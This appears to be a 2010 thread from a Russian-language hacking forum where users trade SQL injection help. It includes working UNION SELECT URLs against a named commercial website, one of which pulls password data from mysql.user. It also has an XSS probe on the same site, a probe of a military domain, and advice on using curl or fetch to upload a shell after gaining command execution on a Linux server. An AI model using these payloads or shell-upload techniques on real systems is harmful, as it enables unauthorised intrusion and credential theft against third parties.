 |
|
22.03.2010, 17:43
|
|
Новичок
Регистрация: 20.12.2008
Сообщений: 24
С нами:
9152742
Репутация:
62
|
|
LokbatanLi,юзай поиск... Читай : http://forum.antichat.ru/thread43966.html https://forum.antichat.ru/thread104591.html
Последний раз редактировалось -=Razor=-; 22.03.2010 в 17:50..
|
|
|
22.03.2010, 17:46
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
Pashkela
Каким способом ты раскрутил эту инъекцию? Как это делать без подбора полей и т.д.? Мб есть линк на статью?
В этой скуле если искать количество полей через group by, то это 12, а если union select, то при вводе 12 появляется ошибка. Почему?
|
|
|
|
22.03.2010, 23:19
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами:
8854580
Репутация:
34
|
|
ось линукс, имеется возможность выполнять системные команды. как закачать полноценный шелл? get и wget не работают...
|
|
|
|
22.03.2010, 23:26
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
curl, fetch
|
|
|
|
22.03.2010, 23:55
|
|
Banned
Регистрация: 05.02.2010
Сообщений: 70
С нами:
8559689
Репутация:
5
|
|
тренируюсь с блинд скулями в собсвенном скрипте.
1. нет нормальных статей по блинду
2. есть табла user с полем login и password
вот пример инжекта моего
http://localhost/index.php?id=1&act=news' and substring(version(),1,1)29=5+--+
помогите плиз состваить запроc на проверку 1-ого симвала логина или пасса. и дайти плиз ссылки на хорошие статьи
|
|
|
|
22.03.2010, 23:59
|
|
Banned
Регистрация: 14.06.2009
Сообщений: 256
С нами:
8899013
Репутация:
105
|
|
http://extensis.cnrc.navy.mil/index.htm?content=http://google.com
Помогите довести до ума
|
|
|
|
23.03.2010, 00:04
|
|
Banned
Регистрация: 05.02.2010
Сообщений: 70
С нами:
8559689
Репутация:
5
|
|
Сообщение от Life7
http://extensis.cnrc.navy.mil/index.htm?content=http://google.com
Помогите довести до ума
вообщето это не инклуд а iframe
http://extensis.cnrc.navy.mil/index.htm?content=http://google.com'
так что доводить нечего...
|
|
|
|
23.03.2010, 02:15
|
|
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
С нами:
11010660
Репутация:
439
|
|
Код:
http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=%3Cscript%3Ealert()%3C/script%3E
со скулем можно что-то накрутить? и какие здесь вообще есть варианты? |
|
|
|
23.03.2010, 02:30
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Код:
http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=1+union+select+1,2,3,version(),5,6,7,8,9,10+limit+1,1
|
|
|
|
23.03.2010, 12:40
|
|
Новичок
Регистрация: 20.12.2008
Сообщений: 24
С нами:
9152742
Репутация:
62
|
|
Сообщение от BrainDeaD
Код:
http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=%3Cscript%3Ealert()%3C/script%3E
со скулем можно что-то накрутить? и какие здесь вообще есть варианты?
Код:
http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=-1+union+select+1,2,3,password,5,6,7,8,9,10+from+mysql.user
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
